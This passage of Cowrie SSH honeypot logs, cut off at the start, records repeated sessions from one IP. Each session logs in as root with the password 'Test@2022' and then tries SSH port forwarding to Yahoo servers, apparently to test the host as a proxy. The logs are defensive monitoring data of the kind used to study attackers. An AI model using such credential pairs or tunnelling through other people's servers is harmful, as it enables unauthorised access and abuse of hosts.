r","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.287667Z","src_ip":"213.209.150.239","session":"6388ac4c5964"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.522912Z","src_ip":"213.209.150.239","session":"6388ac4c5964"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29561,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29561","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.571299Z","session":"6388ac4c5964"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.618602Z","src_ip":"213.209.150.239","session":"6388ac4c5964"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":6679,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6679","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.753515Z","session":"6388ac4c5964"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.800735Z","src_ip":"213.209.150.239","session":"6388ac4c5964"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.848791Z","src_ip":"213.209.150.239","session":"6388ac4c5964"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45825,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e088a695d21","protocol":"ssh","message":"New connection: 213.209.150.239:45825 (1.2.3.4:22) [session: 1e088a695d21]","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.894961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.895648Z","src_ip":"213.209.150.239","session":"1e088a695d21"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:10.943339Z","src_ip":"213.209.150.239","session":"1e088a695d21"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.178550Z","src_ip":"213.209.150.239","session":"1e088a695d21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14126,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14126","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.226979Z","session":"1e088a695d21"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.274202Z","src_ip":"213.209.150.239","session":"1e088a695d21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":12126,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12126","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.409621Z","session":"1e088a695d21"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.457157Z","src_ip":"213.209.150.239","session":"1e088a695d21"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.505416Z","src_ip":"213.209.150.239","session":"1e088a695d21"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45885,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2218f8e8774","protocol":"ssh","message":"New connection: 213.209.150.239:45885 (1.2.3.4:22) [session: c2218f8e8774]","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.561074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.561876Z","src_ip":"213.209.150.239","session":"c2218f8e8774"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.618780Z","src_ip":"213.209.150.239","session":"c2218f8e8774"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.901347Z","src_ip":"213.209.150.239","session":"c2218f8e8774"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14073,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14073","sensor":"my-vps","timestamp":"2025-08-26T01:07:11.958820Z","session":"c2218f8e8774"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.015790Z","src_ip":"213.209.150.239","session":"c2218f8e8774"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":17720,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17720","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.171172Z","session":"c2218f8e8774"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.228904Z","src_ip":"213.209.150.239","session":"c2218f8e8774"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.286325Z","src_ip":"213.209.150.239","session":"c2218f8e8774"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":45950,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d365be9777","protocol":"ssh","message":"New connection: 213.209.150.239:45950 (1.2.3.4:22) [session: 66d365be9777]","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.341675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.342459Z","src_ip":"213.209.150.239","session":"66d365be9777"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.399035Z","src_ip":"213.209.150.239","session":"66d365be9777"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.680740Z","src_ip":"213.209.150.239","session":"66d365be9777"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":19985,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19985","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.737902Z","session":"66d365be9777"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.795176Z","src_ip":"213.209.150.239","session":"66d365be9777"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24497,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24497","sensor":"my-vps","timestamp":"2025-08-26T01:07:12.950921Z","session":"66d365be9777"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.007906Z","src_ip":"213.209.150.239","session":"66d365be9777"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.065416Z","src_ip":"213.209.150.239","session":"66d365be9777"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46108,"dst_ip":"1.2.3.4","dst_port":22,"session":"b77d4027963e","protocol":"ssh","message":"New connection: 213.209.150.239:46108 (1.2.3.4:22) [session: b77d4027963e]","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.111648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.112306Z","src_ip":"213.209.150.239","session":"b77d4027963e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.159643Z","src_ip":"213.209.150.239","session":"b77d4027963e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.395576Z","src_ip":"213.209.150.239","session":"b77d4027963e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":26865,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:26865","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.443893Z","session":"b77d4027963e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.491333Z","src_ip":"213.209.150.239","session":"b77d4027963e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":22584,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:22584","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.629556Z","session":"b77d4027963e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.676891Z","src_ip":"213.209.150.239","session":"b77d4027963e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.725107Z","src_ip":"213.209.150.239","session":"b77d4027963e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46236,"dst_ip":"1.2.3.4","dst_port":22,"session":"42ecf782f556","protocol":"ssh","message":"New connection: 213.209.150.239:46236 (1.2.3.4:22) [session: 42ecf782f556]","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.780771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.782129Z","src_ip":"213.209.150.239","session":"42ecf782f556"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:13.838635Z","src_ip":"213.209.150.239","session":"42ecf782f556"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.120248Z","src_ip":"213.209.150.239","session":"42ecf782f556"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":32427,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:32427","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.177937Z","session":"42ecf782f556"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.234865Z","src_ip":"213.209.150.239","session":"42ecf782f556"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":16792,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16792","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.391083Z","session":"42ecf782f556"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.447778Z","src_ip":"213.209.150.239","session":"42ecf782f556"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.505528Z","src_ip":"213.209.150.239","session":"42ecf782f556"}
